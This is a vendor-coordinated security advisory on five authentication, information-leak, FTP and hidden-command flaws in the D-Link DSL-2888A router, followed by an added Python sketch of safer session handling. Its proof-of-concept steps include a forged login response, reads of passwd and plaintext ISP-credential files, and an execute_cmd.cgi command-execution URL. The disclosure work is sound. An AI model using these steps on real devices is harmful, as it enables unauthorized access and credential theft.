Trustwave SpiderLabs Security Advisory TWSL2020-011:
Multiple Vulnerabilities in D-Link DSL-2888A

Published: 12/17/2020
Version: 1.0

Vendor: D-Link (https://www.dlink.com.au/home-solutions/DSL-2888A-wireless-ac1600-dual-band-gigabit-adsl2-vdsl-modem-router)
Product: Dual Band Wireless AC1600 Gigabit ADSL2+/VDSL2 Modem Router
Version affected: firmware prior to AU_2.31_V1.1.47ae55

Product description from the D-Link Australia website:

The PYTHON - Dual Band Wireless AC1600 Gigabit ADSL2+ / VDSL2 Modem Router (DSL-2888A) has all of your online requirements covered with the ADSL/VDSL modem providing compatibility with all ADSL, VDSL, NBN and UFB connections. With Dual Band AC1600 Wi-Fi providing high speed coverage and a full Gigabit Ethernet interface, this modem will connect desktop computers, smartphones, gaming consoles, smart TVs and more throughout your home.

***********************************************************
Finding 1: Insufficient Authentication
Credit: Harold Zang of Trustwave
CVE: CVE-2020-24580
CWE: CWE-287

Trustwave was able to bypass authentication and access index.html.

PoC:
============================================
1. Navigate to the default login page while using a web interception proxy such as Burp Suite.
2. Submit the login form with an invalid password.
3. Intercept the response and replace it with the following payload:

    HTTP/1.1 302 Found
    Location: /page/login/login_succ.html
    Connection: close

    HTTP/1.1 200 OK
    Connection: close
    ETag: "edd-115-54c5ed7b"
    Last-Modified: Mon, 26 Jan 2015 07:32:11 GMT
    Date: Thu, 01 Jan 1970 00:24:56 GMT
    Content-Type: text/html
    Content-Length: 277
    Transfer-Encoding: chunked

    115

    0

4. Observe successful access to index.html.
***********************************************************
Finding 2: Information Leakage
Credit: Harold Zang of Trustwave
CVE: CVE-2020-24577
CWE: CWE-200

The DSL-2888A One Touch application discloses sensitive information, such as the admin user's password hash and the Internet provider connection username and plaintext password, in the application's response body. A malicious network user may be able to use these credentials to log in to the provider's main website.

PoC:
============================================
1. Navigate to the following pages as an authenticated user:

    http://DeviceIP/tmp/home/wan_stat
    http://DeviceIP/tmp/var/passwd

2. Observe the "wan_stat" file disclosing the Internet provider connection username and plaintext password, and the "passwd" file disclosing the admin user's hash.

***********************************************************
Finding 3: FTP Misconfiguration
Credit: Harold Zang of Trustwave
CVE: CVE-2020-24578
CWE: CWE-16

The DSL-2888A has a misconfigured FTP service that allows a malicious network user to access system folders and download sensitive files such as the password hash file.

PoC:
============================================
1. Using an FTP client, connect to the FTP service with valid credentials:

    ftp DeviceIP

2. Use the following command to navigate to the root folder:

    ftp> cd /

3. Observe that the directory changes successfully.
4. Use the following commands to download the password hash file:

    ftp> cd etc/
    ftp> get passwd

5. Observe successful download of the file containing the admin user's hash.

***********************************************************
Finding 4: Hidden Functionality
Credit: Harold Zang of Trustwave
CVE: CVE-2020-24581
CWE: CWE-912

The DSL-2888A contains functionality that is not reachable through the router's web application user interface. This function allows an authenticated user to execute operating system commands.

PoC:
============================================
1. Navigate to the following URL with a valid session:

    http://DeviceIP/cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=ls

2. Observe successful execution of the command, which lists the current folder.

***********************************************************
Finding 5: Improper Authentication
Credit: Harold Zang of Trustwave
CVE: CVE-2020-24579
CWE: CWE-287

Trustwave was able to access an authenticated page without providing valid credentials.

PoC:
============================================
1. Log in to the web interface with valid credentials from the source IP address 192.168.1.150 with the HTTP header User-Agent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36".
2. Close the browser without clicking the Logout button and shut down the computer.
3. Using a different machine with the same allocated IP address 192.168.1.150 and User-Agent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36", browse to any page that requires authentication, e.g. WiFi.shtml.
4. Observe successful access to the authenticated page without valid credentials being required.

Remediation Steps:
Upgrade to firmware version AU_2.31_V1.1.47ae55 or the latest stable version.

Revision History:
05/26/2020 - Vulnerability disclosed to vendor
08/26/2020 - Tested patch; only FTP Misconfiguration was fixed
10/05/2020 - Retested patch
10/30/2020 - Patch released by vendor
12/17/2020 - Advisory published

References
1. https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10194

About Trustwave:
Trustwave helps businesses fight cybercrime, protect data and reduce security risk. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs.
More than three million businesses are enrolled in the Trustwave TrustKeeper(R) cloud platform, through which Trustwave delivers automated, efficient and cost-effective threat, vulnerability and compliance management. Trustwave is headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit https://www.trustwave.com.

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
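Findings 1 and 5 above share a root cause (CWE-287): access to protected pages is not tied to a server-side secret, so a client-side redirect can be forged (Finding 1) and a session survives on any host presenting the same source IP and User-Agent (Finding 5). The following Python is an added illustration, not DSL-2888A firmware code or Trustwave's: it reconstructs the IP-plus-User-Agent check beside a random session token that the server validates on every protected request. The session store, cookie name `sid`, idle timeout and login URL are assumptions.

```python
# Illustrative (hypothetical, not DSL-2888A firmware) session handling for the CWE-287 issues in Findings 1 and 5.
import hmac
import secrets
import time

SESSION_TTL = 900                       # assumed idle timeout in seconds
LOGIN_PAGE = "/page/login/login.html"   # assumed login URL, not taken from the advisory

def parse_cookies(header):
    """Split a Cookie header such as 'a=1; sid=abc' into a dict, ignoring junk."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep and name:
            cookies[name] = value
    return cookies

class SessionStore:
    """Sessions keyed by an unguessable random token, never by IP or User-Agent."""
    def __init__(self, now=time.time):
        self._sessions = {}   # token -> (user, expiry timestamp)
        self._now = now       # injectable clock so expiry is testable

    def create(self, user):
        token = secrets.token_urlsafe(32)  # 256 bits of randomness
        self._sessions[token] = (user, self._now() + SESSION_TTL)
        return token

    def lookup(self, token):
        """Return the user for a live token; expired sessions are purged on the way."""
        for stored, (user, expiry) in list(self._sessions.items()):
            if self._now() >= expiry:
                del self._sessions[stored]
            elif hmac.compare_digest(stored.encode(), token.encode()):
                return user
        return None

def weak_is_authenticated(request, logged_in_clients):
    """Finding 5 behaviour: a host reusing the same (IP, User-Agent) inherits the session."""
    return (request["ip"], request["user_agent"]) in logged_in_clients

def serve_protected(request, store):
    """Finding 1 fix: the server checks the session cookie on every protected request,
    so a forged 302 to login_succ.html on the client side grants nothing."""
    token = parse_cookies(request.get("cookie", "")).get("sid", "")
    user = store.lookup(token) if token else None
    if user is None:
        return 302, LOGIN_PAGE
    return 200, "index.html for " + user
```

A second machine with the same IP and User-Agent but no cookie passes `weak_is_authenticated` yet receives a 302 from `serve_protected`; the token also expires after the idle timeout, which the step "close the browser without clicking Logout" in Finding 5 otherwise defeats.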